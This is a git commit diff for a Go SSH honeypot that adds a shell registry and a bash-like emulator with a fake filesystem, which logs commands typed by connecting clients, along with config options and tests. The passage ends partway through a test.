feat: add shell interface, registry, and bash shell emulator
Implement Phase 1.4: replaces the hardcoded banner/timeout stub with a proper shell system. Adds a Shell interface with weighted registry for shell selection, a RecordingChannel wrapper (pass-through for now, prep for Phase 2.3 replay), and a bash-like shell with fake filesystem, terminal line reader, and command handling (pwd, ls, cd, cat, whoami, hostname, id, uname, exit). Sessions now log command/output pairs to the store and record the shell name. Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
This commit is contained in:
@@ -37,6 +37,9 @@ Key settings:
|
|||||||
- `storage.db_path` — SQLite database path (default `oubliette.db`)
|
- `storage.db_path` — SQLite database path (default `oubliette.db`)
|
||||||
- `storage.retention_days` — auto-prune records older than N days (default `90`)
|
- `storage.retention_days` — auto-prune records older than N days (default `90`)
|
||||||
- `storage.retention_interval` — how often to run retention (default `1h`)
|
- `storage.retention_interval` — how often to run retention (default `1h`)
|
||||||
|
- `shell.hostname` — hostname shown in shell prompts (default `ubuntu-server`)
|
||||||
|
- `shell.banner` — banner displayed on connection
|
||||||
|
- `shell.fake_user` — override username in prompt; empty uses the authenticated user
|
||||||
|
|
||||||
### Run
|
### Run
|
||||||
|
|
||||||
|
|||||||
@@ -9,11 +9,19 @@ import (
|
|||||||
)
|
)
|
||||||
|
|
||||||
type Config struct {
|
type Config struct {
|
||||||
SSH SSHConfig `toml:"ssh"`
|
SSH SSHConfig `toml:"ssh"`
|
||||||
Auth AuthConfig `toml:"auth"`
|
Auth AuthConfig `toml:"auth"`
|
||||||
Storage StorageConfig `toml:"storage"`
|
Storage StorageConfig `toml:"storage"`
|
||||||
LogLevel string `toml:"log_level"`
|
Shell ShellConfig `toml:"shell"`
|
||||||
LogFormat string `toml:"log_format"` // "text" (default) or "json"
|
LogLevel string `toml:"log_level"`
|
||||||
|
LogFormat string `toml:"log_format"` // "text" (default) or "json"
|
||||||
|
}
|
||||||
|
|
||||||
|
type ShellConfig struct {
|
||||||
|
Hostname string `toml:"hostname"`
|
||||||
|
Banner string `toml:"banner"`
|
||||||
|
FakeUser string `toml:"fake_user"`
|
||||||
|
Shells map[string]map[string]any `toml:"-"` // per-shell config extracted manually
|
||||||
}
|
}
|
||||||
|
|
||||||
type StorageConfig struct {
|
type StorageConfig struct {
|
||||||
@@ -56,6 +64,14 @@ func Load(path string) (*Config, error) {
|
|||||||
return nil, fmt.Errorf("parsing config: %w", err)
|
return nil, fmt.Errorf("parsing config: %w", err)
|
||||||
}
|
}
|
||||||
|
|
||||||
|
// Second pass: extract per-shell sub-tables (e.g. [shell.bash]).
|
||||||
|
var raw map[string]any
|
||||||
|
if err := toml.Unmarshal(data, &raw); err == nil {
|
||||||
|
if shellSection, ok := raw["shell"].(map[string]any); ok {
|
||||||
|
cfg.Shell.Shells = extractShellTables(shellSection)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
applyDefaults(cfg)
|
applyDefaults(cfg)
|
||||||
|
|
||||||
if err := validate(cfg); err != nil {
|
if err := validate(cfg); err != nil {
|
||||||
@@ -96,6 +112,36 @@ func applyDefaults(cfg *Config) {
|
|||||||
if cfg.Storage.RetentionInterval == "" {
|
if cfg.Storage.RetentionInterval == "" {
|
||||||
cfg.Storage.RetentionInterval = "1h"
|
cfg.Storage.RetentionInterval = "1h"
|
||||||
}
|
}
|
||||||
|
if cfg.Shell.Hostname == "" {
|
||||||
|
cfg.Shell.Hostname = "ubuntu-server"
|
||||||
|
}
|
||||||
|
if cfg.Shell.Banner == "" {
|
||||||
|
cfg.Shell.Banner = "Welcome to Ubuntu 22.04.3 LTS (GNU/Linux 5.15.0-89-generic x86_64)\r\n\r\n"
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
// knownShellKeys are top-level keys in [shell] that are not per-shell sub-tables.
|
||||||
|
var knownShellKeys = map[string]bool{
|
||||||
|
"hostname": true,
|
||||||
|
"banner": true,
|
||||||
|
"fake_user": true,
|
||||||
|
}
|
||||||
|
|
||||||
|
// extractShellTables pulls per-shell config sub-tables from the raw [shell] section.
|
||||||
|
func extractShellTables(section map[string]any) map[string]map[string]any {
|
||||||
|
result := make(map[string]map[string]any)
|
||||||
|
for key, val := range section {
|
||||||
|
if knownShellKeys[key] {
|
||||||
|
continue
|
||||||
|
}
|
||||||
|
if sub, ok := val.(map[string]any); ok {
|
||||||
|
result[key] = sub
|
||||||
|
}
|
||||||
|
}
|
||||||
|
if len(result) == 0 {
|
||||||
|
return nil
|
||||||
|
}
|
||||||
|
return result
|
||||||
}
|
}
|
||||||
|
|
||||||
func validate(cfg *Config) error {
|
func validate(cfg *Config) error {
|
||||||
|
|||||||
@@ -169,6 +169,59 @@ retention_interval = "2h"
|
|||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
|
func TestLoadShellDefaults(t *testing.T) {
|
||||||
|
path := writeTemp(t, "")
|
||||||
|
cfg, err := Load(path)
|
||||||
|
if err != nil {
|
||||||
|
t.Fatalf("unexpected error: %v", err)
|
||||||
|
}
|
||||||
|
if cfg.Shell.Hostname != "ubuntu-server" {
|
||||||
|
t.Errorf("default hostname = %q, want %q", cfg.Shell.Hostname, "ubuntu-server")
|
||||||
|
}
|
||||||
|
if cfg.Shell.Banner == "" {
|
||||||
|
t.Error("default banner should not be empty")
|
||||||
|
}
|
||||||
|
if cfg.Shell.FakeUser != "" {
|
||||||
|
t.Errorf("default fake_user = %q, want empty", cfg.Shell.FakeUser)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestLoadShellConfig(t *testing.T) {
|
||||||
|
content := `
|
||||||
|
[shell]
|
||||||
|
hostname = "myhost"
|
||||||
|
banner = "Custom banner\r\n"
|
||||||
|
fake_user = "admin"
|
||||||
|
|
||||||
|
[shell.bash]
|
||||||
|
custom_key = "value"
|
||||||
|
`
|
||||||
|
path := writeTemp(t, content)
|
||||||
|
cfg, err := Load(path)
|
||||||
|
if err != nil {
|
||||||
|
t.Fatalf("unexpected error: %v", err)
|
||||||
|
}
|
||||||
|
if cfg.Shell.Hostname != "myhost" {
|
||||||
|
t.Errorf("hostname = %q, want %q", cfg.Shell.Hostname, "myhost")
|
||||||
|
}
|
||||||
|
if cfg.Shell.Banner != "Custom banner\r\n" {
|
||||||
|
t.Errorf("banner = %q, want %q", cfg.Shell.Banner, "Custom banner\r\n")
|
||||||
|
}
|
||||||
|
if cfg.Shell.FakeUser != "admin" {
|
||||||
|
t.Errorf("fake_user = %q, want %q", cfg.Shell.FakeUser, "admin")
|
||||||
|
}
|
||||||
|
if cfg.Shell.Shells == nil {
|
||||||
|
t.Fatal("Shells map should not be nil")
|
||||||
|
}
|
||||||
|
bashCfg, ok := cfg.Shell.Shells["bash"]
|
||||||
|
if !ok {
|
||||||
|
t.Fatal("Shells[\"bash\"] not found")
|
||||||
|
}
|
||||||
|
if bashCfg["custom_key"] != "value" {
|
||||||
|
t.Errorf("Shells[\"bash\"][\"custom_key\"] = %v, want %q", bashCfg["custom_key"], "value")
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
func TestLoadMissingFile(t *testing.T) {
|
func TestLoadMissingFile(t *testing.T) {
|
||||||
_, err := Load("/nonexistent/path/config.toml")
|
_, err := Load("/nonexistent/path/config.toml")
|
||||||
if err == nil {
|
if err == nil {
|
||||||
|
|||||||
@@ -14,28 +14,35 @@ import (
|
|||||||
|
|
||||||
"git.t-juice.club/torjus/oubliette/internal/auth"
|
"git.t-juice.club/torjus/oubliette/internal/auth"
|
||||||
"git.t-juice.club/torjus/oubliette/internal/config"
|
"git.t-juice.club/torjus/oubliette/internal/config"
|
||||||
|
"git.t-juice.club/torjus/oubliette/internal/shell"
|
||||||
|
"git.t-juice.club/torjus/oubliette/internal/shell/bash"
|
||||||
"git.t-juice.club/torjus/oubliette/internal/storage"
|
"git.t-juice.club/torjus/oubliette/internal/storage"
|
||||||
"golang.org/x/crypto/ssh"
|
"golang.org/x/crypto/ssh"
|
||||||
)
|
)
|
||||||
|
|
||||||
const sessionTimeout = 30 * time.Second
|
|
||||||
|
|
||||||
type Server struct {
|
type Server struct {
|
||||||
cfg config.Config
|
cfg config.Config
|
||||||
store storage.Store
|
store storage.Store
|
||||||
authenticator *auth.Authenticator
|
authenticator *auth.Authenticator
|
||||||
sshConfig *ssh.ServerConfig
|
sshConfig *ssh.ServerConfig
|
||||||
logger *slog.Logger
|
logger *slog.Logger
|
||||||
connSem chan struct{} // semaphore limiting concurrent connections
|
connSem chan struct{} // semaphore limiting concurrent connections
|
||||||
|
shellRegistry *shell.Registry
|
||||||
}
|
}
|
||||||
|
|
||||||
func New(cfg config.Config, store storage.Store, logger *slog.Logger) (*Server, error) {
|
func New(cfg config.Config, store storage.Store, logger *slog.Logger) (*Server, error) {
|
||||||
|
registry := shell.NewRegistry()
|
||||||
|
if err := registry.Register(bash.NewBashShell(), 1); err != nil {
|
||||||
|
return nil, fmt.Errorf("registering bash shell: %w", err)
|
||||||
|
}
|
||||||
|
|
||||||
s := &Server{
|
s := &Server{
|
||||||
cfg: cfg,
|
cfg: cfg,
|
||||||
store: store,
|
store: store,
|
||||||
authenticator: auth.NewAuthenticator(cfg.Auth),
|
authenticator: auth.NewAuthenticator(cfg.Auth),
|
||||||
logger: logger,
|
logger: logger,
|
||||||
connSem: make(chan struct{}, cfg.SSH.MaxConnections),
|
connSem: make(chan struct{}, cfg.SSH.MaxConnections),
|
||||||
|
shellRegistry: registry,
|
||||||
}
|
}
|
||||||
|
|
||||||
hostKey, err := loadOrGenerateHostKey(cfg.SSH.HostKeyPath)
|
hostKey, err := loadOrGenerateHostKey(cfg.SSH.HostKeyPath)
|
||||||
@@ -126,8 +133,15 @@ func (s *Server) handleConn(conn net.Conn) {
|
|||||||
func (s *Server) handleSession(channel ssh.Channel, requests <-chan *ssh.Request, conn *ssh.ServerConn) {
|
func (s *Server) handleSession(channel ssh.Channel, requests <-chan *ssh.Request, conn *ssh.ServerConn) {
|
||||||
defer channel.Close()
|
defer channel.Close()
|
||||||
|
|
||||||
|
// Select a shell from the registry.
|
||||||
|
selectedShell, err := s.shellRegistry.Select()
|
||||||
|
if err != nil {
|
||||||
|
s.logger.Error("failed to select shell", "err", err)
|
||||||
|
return
|
||||||
|
}
|
||||||
|
|
||||||
ip := extractIP(conn.RemoteAddr())
|
ip := extractIP(conn.RemoteAddr())
|
||||||
sessionID, err := s.store.CreateSession(context.Background(), ip, conn.User(), "")
|
sessionID, err := s.store.CreateSession(context.Background(), ip, conn.User(), selectedShell.Name())
|
||||||
if err != nil {
|
if err != nil {
|
||||||
s.logger.Error("failed to create session", "err", err)
|
s.logger.Error("failed to create session", "err", err)
|
||||||
} else {
|
} else {
|
||||||
@@ -138,6 +152,13 @@ func (s *Server) handleSession(channel ssh.Channel, requests <-chan *ssh.Request
|
|||||||
}()
|
}()
|
||||||
}
|
}
|
||||||
|
|
||||||
|
s.logger.Info("session started",
|
||||||
|
"remote_addr", conn.RemoteAddr(),
|
||||||
|
"user", conn.User(),
|
||||||
|
"shell", selectedShell.Name(),
|
||||||
|
"session_id", sessionID,
|
||||||
|
)
|
||||||
|
|
||||||
// Handle session requests (pty-req, shell, etc.)
|
// Handle session requests (pty-req, shell, etc.)
|
||||||
go func() {
|
go func() {
|
||||||
for req := range requests {
|
for req := range requests {
|
||||||
@@ -154,33 +175,37 @@ func (s *Server) handleSession(channel ssh.Channel, requests <-chan *ssh.Request
|
|||||||
}
|
}
|
||||||
}()
|
}()
|
||||||
|
|
||||||
// Write a fake banner.
|
// Build session context.
|
||||||
fmt.Fprint(channel, "Welcome to Ubuntu 22.04.3 LTS (GNU/Linux 5.15.0-89-generic x86_64)\r\n\r\n")
|
var shellCfg map[string]any
|
||||||
fmt.Fprintf(channel, "Last login: %s from 10.0.0.1\r\n", time.Now().Add(-2*time.Hour).Format("Mon Jan 2 15:04:05 2006"))
|
if s.cfg.Shell.Shells != nil {
|
||||||
fmt.Fprintf(channel, "%s@ubuntu:~$ ", conn.User())
|
shellCfg = s.cfg.Shell.Shells[selectedShell.Name()]
|
||||||
|
|
||||||
// Hold connection open until timeout or client disconnect.
|
|
||||||
timer := time.NewTimer(sessionTimeout)
|
|
||||||
defer timer.Stop()
|
|
||||||
|
|
||||||
done := make(chan struct{})
|
|
||||||
go func() {
|
|
||||||
buf := make([]byte, 256)
|
|
||||||
for {
|
|
||||||
_, err := channel.Read(buf)
|
|
||||||
if err != nil {
|
|
||||||
close(done)
|
|
||||||
return
|
|
||||||
}
|
|
||||||
}
|
|
||||||
}()
|
|
||||||
|
|
||||||
select {
|
|
||||||
case <-timer.C:
|
|
||||||
s.logger.Info("session timed out", "remote_addr", conn.RemoteAddr(), "user", conn.User())
|
|
||||||
case <-done:
|
|
||||||
s.logger.Info("session closed by client", "remote_addr", conn.RemoteAddr(), "user", conn.User())
|
|
||||||
}
|
}
|
||||||
|
sessCtx := &shell.SessionContext{
|
||||||
|
SessionID: sessionID,
|
||||||
|
Username: conn.User(),
|
||||||
|
RemoteAddr: ip,
|
||||||
|
ClientVersion: string(conn.ClientVersion()),
|
||||||
|
Store: s.store,
|
||||||
|
ShellConfig: shellCfg,
|
||||||
|
CommonConfig: shell.ShellCommonConfig{
|
||||||
|
Hostname: s.cfg.Shell.Hostname,
|
||||||
|
Banner: s.cfg.Shell.Banner,
|
||||||
|
FakeUser: s.cfg.Shell.FakeUser,
|
||||||
|
},
|
||||||
|
}
|
||||||
|
|
||||||
|
// Wrap channel in RecordingChannel for future byte-level recording.
|
||||||
|
recorder := shell.NewRecordingChannel(channel)
|
||||||
|
|
||||||
|
if err := selectedShell.Handle(context.Background(), sessCtx, recorder); err != nil {
|
||||||
|
s.logger.Error("shell error", "err", err, "session_id", sessionID)
|
||||||
|
}
|
||||||
|
|
||||||
|
s.logger.Info("session ended",
|
||||||
|
"remote_addr", conn.RemoteAddr(),
|
||||||
|
"user", conn.User(),
|
||||||
|
"session_id", sessionID,
|
||||||
|
)
|
||||||
}
|
}
|
||||||
|
|
||||||
func (s *Server) passwordCallback(conn ssh.ConnMetadata, password []byte) (*ssh.Permissions, error) {
|
func (s *Server) passwordCallback(conn ssh.ConnMetadata, password []byte) (*ssh.Permissions, error) {
|
||||||
|
|||||||
@@ -1,11 +1,13 @@
|
|||||||
package server
|
package server
|
||||||
|
|
||||||
import (
|
import (
|
||||||
|
"bytes"
|
||||||
"context"
|
"context"
|
||||||
"log/slog"
|
"log/slog"
|
||||||
"net"
|
"net"
|
||||||
"os"
|
"os"
|
||||||
"path/filepath"
|
"path/filepath"
|
||||||
|
"strings"
|
||||||
"testing"
|
"testing"
|
||||||
"time"
|
"time"
|
||||||
|
|
||||||
@@ -109,6 +111,10 @@ func TestIntegrationSSHConnect(t *testing.T) {
|
|||||||
{Username: "root", Password: "toor"},
|
{Username: "root", Password: "toor"},
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
|
Shell: config.ShellConfig{
|
||||||
|
Hostname: "ubuntu-server",
|
||||||
|
Banner: "Welcome to Ubuntu 22.04.3 LTS\r\n\r\n",
|
||||||
|
},
|
||||||
LogLevel: "debug",
|
LogLevel: "debug",
|
||||||
}
|
}
|
||||||
|
|
||||||
@@ -152,7 +158,7 @@ func TestIntegrationSSHConnect(t *testing.T) {
|
|||||||
time.Sleep(50 * time.Millisecond)
|
time.Sleep(50 * time.Millisecond)
|
||||||
}
|
}
|
||||||
|
|
||||||
// Test static credential login.
|
// Test static credential login with shell interaction.
|
||||||
t.Run("static_cred", func(t *testing.T) {
|
t.Run("static_cred", func(t *testing.T) {
|
||||||
clientCfg := &ssh.ClientConfig{
|
clientCfg := &ssh.ClientConfig{
|
||||||
User: "root",
|
User: "root",
|
||||||
@@ -172,6 +178,62 @@ func TestIntegrationSSHConnect(t *testing.T) {
|
|||||||
t.Fatalf("new session: %v", err)
|
t.Fatalf("new session: %v", err)
|
||||||
}
|
}
|
||||||
defer session.Close()
|
defer session.Close()
|
||||||
|
|
||||||
|
// Request PTY and shell.
|
||||||
|
if err := session.RequestPty("xterm", 80, 40, ssh.TerminalModes{}); err != nil {
|
||||||
|
t.Fatalf("request pty: %v", err)
|
||||||
|
}
|
||||||
|
|
||||||
|
stdin, err := session.StdinPipe()
|
||||||
|
if err != nil {
|
||||||
|
t.Fatalf("stdin pipe: %v", err)
|
||||||
|
}
|
||||||
|
|
||||||
|
var output bytes.Buffer
|
||||||
|
session.Stdout = &output
|
||||||
|
|
||||||
|
if err := session.Shell(); err != nil {
|
||||||
|
t.Fatalf("shell: %v", err)
|
||||||
|
}
|
||||||
|
|
||||||
|
// Wait for the prompt, then send commands.
|
||||||
|
time.Sleep(500 * time.Millisecond)
|
||||||
|
stdin.Write([]byte("pwd\r"))
|
||||||
|
time.Sleep(200 * time.Millisecond)
|
||||||
|
stdin.Write([]byte("whoami\r"))
|
||||||
|
time.Sleep(200 * time.Millisecond)
|
||||||
|
stdin.Write([]byte("exit\r"))
|
||||||
|
|
||||||
|
// Wait for session to end.
|
||||||
|
session.Wait()
|
||||||
|
|
||||||
|
out := output.String()
|
||||||
|
if !strings.Contains(out, "Welcome to Ubuntu") {
|
||||||
|
t.Errorf("output should contain banner, got: %s", out)
|
||||||
|
}
|
||||||
|
if !strings.Contains(out, "/root") {
|
||||||
|
t.Errorf("output should contain /root from pwd, got: %s", out)
|
||||||
|
}
|
||||||
|
if !strings.Contains(out, "root") {
|
||||||
|
t.Errorf("output should contain 'root' from whoami, got: %s", out)
|
||||||
|
}
|
||||||
|
|
||||||
|
// Verify session logs were recorded.
|
||||||
|
if len(store.SessionLogs) < 2 {
|
||||||
|
t.Errorf("expected at least 2 session logs, got %d", len(store.SessionLogs))
|
||||||
|
}
|
||||||
|
|
||||||
|
// Verify session was created with shell name.
|
||||||
|
var foundBash bool
|
||||||
|
for _, s := range store.Sessions {
|
||||||
|
if s.ShellName == "bash" {
|
||||||
|
foundBash = true
|
||||||
|
break
|
||||||
|
}
|
||||||
|
}
|
||||||
|
if !foundBash {
|
||||||
|
t.Error("expected a session with shell_name='bash'")
|
||||||
|
}
|
||||||
})
|
})
|
||||||
|
|
||||||
// Test wrong password is rejected.
|
// Test wrong password is rejected.
|
||||||
|
|||||||
158
internal/shell/bash/bash.go
Normal file
158
internal/shell/bash/bash.go
Normal file
@@ -0,0 +1,158 @@
|
|||||||
|
package bash
|
||||||
|
|
||||||
|
import (
|
||||||
|
"context"
|
||||||
|
"fmt"
|
||||||
|
"io"
|
||||||
|
"strings"
|
||||||
|
"time"
|
||||||
|
|
||||||
|
"git.t-juice.club/torjus/oubliette/internal/shell"
|
||||||
|
)
|
||||||
|
|
||||||
|
const sessionTimeout = 5 * time.Minute
|
||||||
|
|
||||||
|
// BashShell emulates a basic bash-like shell.
|
||||||
|
type BashShell struct{}
|
||||||
|
|
||||||
|
// NewBashShell returns a new BashShell instance.
|
||||||
|
func NewBashShell() *BashShell {
|
||||||
|
return &BashShell{}
|
||||||
|
}
|
||||||
|
|
||||||
|
func (b *BashShell) Name() string { return "bash" }
|
||||||
|
func (b *BashShell) Description() string { return "Basic bash-like shell emulator" }
|
||||||
|
|
||||||
|
func (b *BashShell) Handle(ctx context.Context, sess *shell.SessionContext, rw io.ReadWriteCloser) error {
|
||||||
|
ctx, cancel := context.WithTimeout(ctx, sessionTimeout)
|
||||||
|
defer cancel()
|
||||||
|
|
||||||
|
username := sess.Username
|
||||||
|
if sess.CommonConfig.FakeUser != "" {
|
||||||
|
username = sess.CommonConfig.FakeUser
|
||||||
|
}
|
||||||
|
hostname := sess.CommonConfig.Hostname
|
||||||
|
|
||||||
|
fs := newFilesystem(hostname)
|
||||||
|
state := &shellState{
|
||||||
|
cwd: "/root",
|
||||||
|
username: username,
|
||||||
|
hostname: hostname,
|
||||||
|
fs: fs,
|
||||||
|
}
|
||||||
|
|
||||||
|
// Send banner.
|
||||||
|
if sess.CommonConfig.Banner != "" {
|
||||||
|
fmt.Fprint(rw, sess.CommonConfig.Banner)
|
||||||
|
}
|
||||||
|
fmt.Fprintf(rw, "Last login: %s from 10.0.0.1\r\n",
|
||||||
|
time.Now().Add(-2*time.Hour).Format("Mon Jan 2 15:04:05 2006"))
|
||||||
|
|
||||||
|
for {
|
||||||
|
prompt := formatPrompt(state)
|
||||||
|
if _, err := fmt.Fprint(rw, prompt); err != nil {
|
||||||
|
return nil
|
||||||
|
}
|
||||||
|
|
||||||
|
line, err := readLine(ctx, rw)
|
||||||
|
if err == io.EOF {
|
||||||
|
fmt.Fprint(rw, "logout\r\n")
|
||||||
|
return nil
|
||||||
|
}
|
||||||
|
if err != nil {
|
||||||
|
return nil
|
||||||
|
}
|
||||||
|
|
||||||
|
trimmed := strings.TrimSpace(line)
|
||||||
|
if trimmed == "" {
|
||||||
|
continue
|
||||||
|
}
|
||||||
|
|
||||||
|
result := dispatch(state, trimmed)
|
||||||
|
|
||||||
|
var output string
|
||||||
|
if result.output != "" {
|
||||||
|
output = result.output
|
||||||
|
// Convert newlines to \r\n for terminal display.
|
||||||
|
output = strings.ReplaceAll(output, "\r\n", "\n")
|
||||||
|
output = strings.ReplaceAll(output, "\n", "\r\n")
|
||||||
|
fmt.Fprintf(rw, "%s\r\n", output)
|
||||||
|
}
|
||||||
|
|
||||||
|
// Log command and output to store.
|
||||||
|
if sess.Store != nil {
|
||||||
|
sess.Store.AppendSessionLog(ctx, sess.SessionID, trimmed, output)
|
||||||
|
}
|
||||||
|
|
||||||
|
if result.exit {
|
||||||
|
return nil
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func formatPrompt(state *shellState) string {
|
||||||
|
cwd := state.cwd
|
||||||
|
if cwd == "/root" {
|
||||||
|
cwd = "~"
|
||||||
|
} else if strings.HasPrefix(cwd, "/root/") {
|
||||||
|
cwd = "~" + cwd[5:]
|
||||||
|
}
|
||||||
|
return fmt.Sprintf("%s@%s:%s# ", state.username, state.hostname, cwd)
|
||||||
|
}
|
||||||
|
|
||||||
|
// readLine reads a line of input byte-by-byte, handling backspace, Ctrl+C, and Ctrl+D.
|
||||||
|
func readLine(ctx context.Context, rw io.ReadWriter) (string, error) {
|
||||||
|
var buf []byte
|
||||||
|
b := make([]byte, 1)
|
||||||
|
|
||||||
|
for {
|
||||||
|
select {
|
||||||
|
case <-ctx.Done():
|
||||||
|
return "", ctx.Err()
|
||||||
|
default:
|
||||||
|
}
|
||||||
|
|
||||||
|
n, err := rw.Read(b)
|
||||||
|
if err != nil {
|
||||||
|
return "", err
|
||||||
|
}
|
||||||
|
if n == 0 {
|
||||||
|
continue
|
||||||
|
}
|
||||||
|
|
||||||
|
ch := b[0]
|
||||||
|
switch {
|
||||||
|
case ch == '\r' || ch == '\n':
|
||||||
|
fmt.Fprint(rw, "\r\n")
|
||||||
|
return string(buf), nil
|
||||||
|
|
||||||
|
case ch == 4: // Ctrl+D
|
||||||
|
if len(buf) == 0 {
|
||||||
|
return "", io.EOF
|
||||||
|
}
|
||||||
|
|
||||||
|
case ch == 3: // Ctrl+C
|
||||||
|
fmt.Fprint(rw, "^C\r\n")
|
||||||
|
return "", nil
|
||||||
|
|
||||||
|
case ch == 127 || ch == 8: // DEL or Backspace
|
||||||
|
if len(buf) > 0 {
|
||||||
|
buf = buf[:len(buf)-1]
|
||||||
|
fmt.Fprint(rw, "\b \b")
|
||||||
|
}
|
||||||
|
|
||||||
|
case ch == 27: // ESC - start of escape sequence
|
||||||
|
// Read and discard the rest of the escape sequence.
|
||||||
|
// Most are 3 bytes: ESC [ X (arrow keys, etc.)
|
||||||
|
next := make([]byte, 1)
|
||||||
|
rw.Read(next)
|
||||||
|
if next[0] == '[' {
|
||||||
|
rw.Read(next) // read the final byte
|
||||||
|
}
|
||||||
|
|
||||||
|
case ch >= 32 && ch < 127: // printable ASCII
|
||||||
|
buf = append(buf, ch)
|
||||||
|
rw.Write([]byte{ch})
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
198
internal/shell/bash/bash_test.go
Normal file
198
internal/shell/bash/bash_test.go
Normal file
@@ -0,0 +1,198 @@
|
|||||||
|
package bash
|
||||||
|
|
||||||
|
import (
|
||||||
|
"bytes"
|
||||||
|
"context"
|
||||||
|
"io"
|
||||||
|
"strings"
|
||||||
|
"testing"
|
||||||
|
"time"
|
||||||
|
|
||||||
|
"git.t-juice.club/torjus/oubliette/internal/shell"
|
||||||
|
"git.t-juice.club/torjus/oubliette/internal/storage"
|
||||||
|
)
|
||||||
|
|
||||||
|
type rwCloser struct {
|
||||||
|
io.Reader
|
||||||
|
io.Writer
|
||||||
|
closed bool
|
||||||
|
}
|
||||||
|
|
||||||
|
func (r *rwCloser) Close() error {
|
||||||
|
r.closed = true
|
||||||
|
return nil
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestFormatPrompt(t *testing.T) {
|
||||||
|
tests := []struct {
|
||||||
|
cwd string
|
||||||
|
want string
|
||||||
|
}{
|
||||||
|
{"/root", "root@host:~# "},
|
||||||
|
{"/root/sub", "root@host:~/sub# "},
|
||||||
|
{"/tmp", "root@host:/tmp# "},
|
||||||
|
{"/", "root@host:/# "},
|
||||||
|
}
|
||||||
|
|
||||||
|
for _, tt := range tests {
|
||||||
|
state := &shellState{cwd: tt.cwd, username: "root", hostname: "host"}
|
||||||
|
got := formatPrompt(state)
|
||||||
|
if got != tt.want {
|
||||||
|
t.Errorf("formatPrompt(cwd=%q) = %q, want %q", tt.cwd, got, tt.want)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestReadLineEnter(t *testing.T) {
|
||||||
|
input := bytes.NewBufferString("hello\r")
|
||||||
|
var output bytes.Buffer
|
||||||
|
rw := struct {
|
||||||
|
io.Reader
|
||||||
|
io.Writer
|
||||||
|
}{input, &output}
|
||||||
|
|
||||||
|
ctx := context.Background()
|
||||||
|
line, err := readLine(ctx, rw)
|
||||||
|
if err != nil {
|
||||||
|
t.Fatalf("readLine: %v", err)
|
||||||
|
}
|
||||||
|
if line != "hello" {
|
||||||
|
t.Errorf("line = %q, want %q", line, "hello")
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestReadLineBackspace(t *testing.T) {
|
||||||
|
// Type "helo", backspace, then "lo\r"
|
||||||
|
input := bytes.NewBuffer([]byte{'h', 'e', 'l', 'o', 127, 'l', 'o', '\r'})
|
||||||
|
var output bytes.Buffer
|
||||||
|
rw := struct {
|
||||||
|
io.Reader
|
||||||
|
io.Writer
|
||||||
|
}{input, &output}
|
||||||
|
|
||||||
|
ctx := context.Background()
|
||||||
|
line, err := readLine(ctx, rw)
|
||||||
|
if err != nil {
|
||||||
|
t.Fatalf("readLine: %v", err)
|
||||||
|
}
|
||||||
|
if line != "hello" {
|
||||||
|
t.Errorf("line = %q, want %q", line, "hello")
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestReadLineCtrlC(t *testing.T) {
|
||||||
|
input := bytes.NewBuffer([]byte("partial\x03"))
|
||||||
|
var output bytes.Buffer
|
||||||
|
rw := struct {
|
||||||
|
io.Reader
|
||||||
|
io.Writer
|
||||||
|
}{input, &output}
|
||||||
|
|
||||||
|
ctx := context.Background()
|
||||||
|
line, err := readLine(ctx, rw)
|
||||||
|
if err != nil {
|
||||||
|
t.Fatalf("readLine: %v", err)
|
||||||
|
}
|
||||||
|
if line != "" {
|
||||||
|
t.Errorf("line after Ctrl+C = %q, want empty", line)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestReadLineCtrlD(t *testing.T) {
|
||||||
|
input := bytes.NewBuffer([]byte{4}) // Ctrl+D on empty line
|
||||||
|
var output bytes.Buffer
|
||||||
|
rw := struct {
|
||||||
|
io.Reader
|
||||||
|
io.Writer
|
||||||
|
}{input, &output}
|
||||||
|
|
||||||
|
ctx := context.Background()
|
||||||
|
_, err := readLine(ctx, rw)
|
||||||
|
if err != io.EOF {
|
||||||
|
t.Fatalf("expected io.EOF, got %v", err)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestBashShellHandle(t *testing.T) {
|
||||||
|
store := storage.NewMemoryStore()
|
||||||
|
sessID, _ := store.CreateSession(context.Background(), "127.0.0.1", "root", "bash")
|
||||||
|
|
||||||
|
sess := &shell.SessionContext{
|
||||||
|
SessionID: sessID,
|
||||||
|
Username: "root",
|
||||||
|
Store: store,
|
||||||
|
CommonConfig: shell.ShellCommonConfig{
|
||||||
|
Hostname: "testhost",
|
||||||
|
Banner: "Welcome to Ubuntu 22.04.3 LTS\r\n\r\n",
|
||||||
|
},
|
||||||
|
}
|
||||||
|
|
||||||
|
// Simulate typing commands followed by "exit\r"
|
||||||
|
commands := "pwd\rwhoami\rexit\r"
|
||||||
|
clientInput := bytes.NewBufferString(commands)
|
||||||
|
var clientOutput bytes.Buffer
|
||||||
|
rw := &rwCloser{
|
||||||
|
Reader: clientInput,
|
||||||
|
Writer: &clientOutput,
|
||||||
|
}
|
||||||
|
|
||||||
|
sh := NewBashShell()
|
||||||
|
ctx, cancel := context.WithTimeout(context.Background(), 5*time.Second)
|
||||||
|
defer cancel()
|
||||||
|
|
||||||
|
err := sh.Handle(ctx, sess, rw)
|
||||||
|
if err != nil {
|
||||||
|
t.Fatalf("Handle: %v", err)
|
||||||
|
}
|
||||||
|
|
||||||
|
output := clientOutput.String()
|
||||||
|
|
||||||
|
// Should contain banner.
|
||||||
|
if !strings.Contains(output, "Welcome to Ubuntu") {
|
||||||
|
t.Error("output should contain banner")
|
||||||
|
}
|
||||||
|
|
||||||
|
// Should contain prompt with hostname.
|
||||||
|
if !strings.Contains(output, "root@testhost") {
|
||||||
|
t.Errorf("output should contain prompt, got: %s", output)
|
||||||
|
}
